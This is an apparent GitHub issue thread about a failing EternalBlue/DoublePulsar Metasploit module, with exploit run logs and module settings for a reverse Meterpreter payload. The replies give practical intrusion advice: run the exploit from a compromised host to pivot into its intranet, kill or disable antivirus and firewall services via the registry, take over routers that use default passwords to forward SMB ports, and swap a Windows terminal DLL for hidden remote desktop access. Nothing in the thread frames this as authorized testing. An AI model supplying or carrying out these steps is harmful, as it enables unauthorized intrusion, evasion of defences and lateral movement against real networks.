
Error getting output back from Core; aborting

Open CoolBreezeGit opened this issue 7 years ago • 25 comments

I access the remote intranet machine via post/windows/manage/autoroute.

192.168.244.0 255.255.255.0 Session 7

Then I want to attack a remote host with eternalblue_doublepulsar, but it failed.

```
[*] 192.168.244.134:445 - Generating Doublepulsar XML data
[*] 192.168.244.134:445 - Generating payload DLL for Doublepulsar
[*] 192.168.244.134:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.244.134:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.244.134:445 - Are you sure it's vulnerable?
```

But as a matter of fact, 192.168.244.134 is vulnerable. Does my machine have to be in the intranet 192.168.244.0/24, too? Asking for help, thank you.

CoolBreezeGit, May 12 '17 06:05

Same issue. But I've seen a lot of demos on YouTube doing it over their virtual machines. I've added a screenshot of my auxiliary/scanner/smb/smb_ms17_010 result and the actual error itself together with the settings I used. I also did an nmap scan and it did show that port 445 is open. Additionally, I could also ping the target and I'm sure that the VM target is a 32-bit machine. Newbie here. What could be the problem? [screenshot from 2017-05-15 21-45-56] [screenshot from 2017-05-15 21-46-06]

6a61756d, May 15 '17 14:05

Well, things are different for us. I mean, my machine is not in this intranet, just attacked by the puppet machine. In addition, I successfully attacked the virtual machine via eternalblue_doublepulsar. Regarding your case, do you confirm that your goal is Windows XP?

CoolBreezeGit, May 16 '17 07:05

Sup. Correct me if I'm wrong. I think the problem is about routing. It seems that you can't use EternalBlue "remotely" through a Meterpreter session. The problem is that Wine isn't able to reach the session, so basically you execute EternalBlue from your local IP instead of "theirs". Any help on this?

Ug0Security, May 16 '17 10:05

As a workaround you can:

1. Set the XML parameters so they fit your target (with Metasploit or not)
2. Upload the deps files to the compromised host
3. Execute EternalBlue/Doublepulsar from the compromised host (this way it can reach the local IP address)
4. Profit?

Ug0Security, May 16 '17 10:05

@CoolBreezeGit As you can see in the screenshot I provided, the target is a Windows XP x86 virtual machine. Its network setting is properly configured (bridged through my host machine). I am trying to look at the source code now. How did you fix the problem?

6a61756d, May 16 '17 15:05

Anyone figure it out?

NitroMS, May 22 '17 16:05

Hi, I have the same issue. The exploit is running OK in my LAN, but through a VPN the errors are:

```
[*] Started reverse TCP handler on 192.168.15.0:4444
[*] 192.168.0.96:445 - Generating Eternalblue XML data
[*] 192.168.0.96:445 - Generating Doublepulsar XML data
[*] 192.168.0.96:445 - Generating payload DLL for Doublepulsar
[*] 192.168.0.96:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.0.96:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.0.96:445 - Are you sure it's vulnerable?
[*] 192.168.0.96:445 - Launching Doublepulsar...
[-] 192.168.0.96:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created
```

I can ping and telnet to port 445 successfully, but I think this is caused by some type of routing problem with Wine. Regards

fquiroga, May 25 '17 02:05

@fquiroga I haven't resolved the issue yet. How about you?

6a61756d, May 26 '17 12:05

@6a61756d Nope, I didn't resolve the issue. Using auxiliary/scanner/smb/smb_ms17_010 the host seems vulnerable, but I can't exploit it through a VPN, even if I configure the LHOST to my VPN interface, and I'm sure that no firewall is running in the network.

fquiroga, May 29 '17 12:05

I have the same problem. Can it be a problem with Wine?

Adawang007, Jul 29 '17 04:07

It seems that the operating system has been patched...

Adawang007, Jul 29 '17 04:07

If you are exploiting a public IP, then the only way for the vulnerable host to communicate with your Meterpreter session is if you configure your gateway router with a port forward directly to your LAN IP. If you can connect to the internet directly from your Linux machine without routing through a gateway device like a router, then you will be able to connect successfully to the target.

One of the most common causes of this problem is also when the vulnerable host has some software firewall looking at the TCP connections. What happens is that EternalBlue is able to connect to the target, but the Meterpreter session is unable to connect to you because some firewall software is blocking it.

peterpt, Aug 21 '17 22:08

Yep! My ISP is blocking all the incoming connections.

Mys7erio, Dec 31 '17 08:12

From what I could see in the code, this Ruby script creates an XML config file with all the config options and then executes the EternalBlue executable from Equation Group. Maybe the best solution to exploit an intranet machine is to set up an XML config file manually and build a DLL output with Metasploit with the payload, where the payload is set to connect to your IP and not the hacked machine you are connected to. Then, using Meterpreter, upload the 3 files to the 1st remote target and execute eternalblue.exe from there. This way, eternalblue.exe will target the intranet machine, and then the intranet machine will open a reverse Meterpreter connection to your IP.

However, if the hacked machine has some firewall software running, then it will pop up a message blocking the connection from the hacked machine to the intranet machine. To avoid this, maybe killing that firewall (antivirus) service could be the best option for success. But most software firewalls have countermeasures against being shut down, which means that the firewall software will restart again or will not be killed. When this scenario happens, the best way to get around it is to look into the registry settings of that machine, look for startup services, set the firewall services off on startup and then force a restart of the hacked machine.

After all, the original Fuzzbunch package from Shadow Brokers was all about that, and this is why they were able to get that package: for the NSA to be able to get into the intranet of a specific network structure, they had to install their Fuzzbunch package on the remote hacked machine and then run it from there against the rest of the network.

However, I have no idea if a 64-bit machine will run eternalblue.exe correctly, because the original Fuzzbunch package only works fine on 32-bit machines.

Another option to access a specific intranet machine would be hacking the router (firewall) through an SSH session via the hacked machine and setting a port forward rule to that intranet machine on another port.

intranet machine - router port 445 -> 567

and configuring Doublepulsar to exploit port 567 on that 1st remote IP. But it will not be easy, unless that remote router (firewall) still uses the default brand username & password.

For Windows XP, the best way to hack their intranet safely without popping up firewalls on the currently logged-in user is to replace the terminal DLL with a hacked one that allows a remote desktop connection without logging off the current user. http://www.freetutorialssubmit.com/concurrent-remote-desktop-without-log-off-other-users/801

By replacing the DLL and starting the remote desktop server on the first hacked machine via Meterpreter, you will be able to connect to that 1st hacked machine and do the rest by remote desktop in a different user session. This way the software firewall will not pop up connection warnings to the other user. I have no idea if this (remote desktop hacking) exists for new Windows versions, but if anyone reading this knows, then drop a link here for others to test.

Note: only now I notice that Ug0Security already gave this exploiting option for intranet.

peterpt, Dec 31 '17 09:12

@Ug0Security Maybe you are right; what if the problem is that the machine is not in your subnet? However, what could be a good workaround for this? Maybe changing some options in the Wine setup. I'm not an expert, but if the problem is that simple, this should take a few minutes for an expert.

ppdmartell, Feb 07 '18 12:02

What can I do?

```
[*] Started reverse TCP handler on 192.168.0.114:4444
[*] 192.168.0.105:445 - Generating Eternalblue XML data
[*] 192.168.0.105:445 - Generating Doublepulsar XML data
[*] 192.168.0.105:445 - Generating payload DLL for Doublepulsar
[*] 192.168.0.105:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.0.105:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.0.105:445 - Are you sure it's vulnerable?
[*] 192.168.0.105:445 - Launching Doublepulsar...
[-] 192.168.0.105:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
```

ghost, Dec 18 '18 19:12

My options:

```
Module options (exploit/windows/smb/eternalblue_doublepulsar):

   Name                Current Setting                                   Required  Description
   ----                ---------------                                   --------  -----------
   DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/   yes       Path directory of Doublepulsar
   ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/   yes       Path directory of Eternalblue
   PROCESSINJECT       explorer.exe                                      yes       Name of process to inject into (Change to lsass.exe for x64)
   RHOST               192.168.0.105                                     yes       The target address
   RPORT               445                                               yes       The SMB service port (TCP)
   TARGETARCHITECTURE  x64                                               yes       Target Architecture (Accepted: x86, x64)
   WINEPATH            /root/.wine/drive_c/                              yes       WINE drive_c path

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.114    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   5   Windows Vista (x64)
```

ghost, Dec 18 '18 19:12

I tried changing explorer.exe to lsass.exe but it does not work :(

ghost, Dec 18 '18 19:12

Injecting a 32-bit DLL into a 64-bit machine will work, but 64-bit into 32-bit machines will crash the service or Windows, or will pop an error to the currently logged-in user. You all must realize that Microsoft already released patches for Windows, including XP POSReady, for this vulnerability; sometimes, if you can't exploit it, it could mean that Windows is already patched. The exploit could be named "Eternal", but it is only eternal until the user installs the patch for that Windows version; after that point it is no longer eternal.

peterpt, Dec 18 '18 22:12

ANYONE SOLVED IT?

AoG22, Aug 11 '20 20:08

Stop using this.. there are way better alternatives now..

https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/smb

Ug0Security, Aug 11 '20 22:08

Thank you.


AoG22, Aug 11 '20 22:08

When I use ms17_010_psexec, I get a message that the victim is not vulnerable.


AoG22, Aug 11 '20 22:08

Hey, can someone help me sort out what files or stuff are missing here? [sample1] [sample2]

lilplucky, Aug 11 '21 20:08

> Stop using this.. there are way better alternatives now..
>
> https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/smb

Which one is the best for Eternalblue?

ZhiboWong, Oct 26 '22 03:10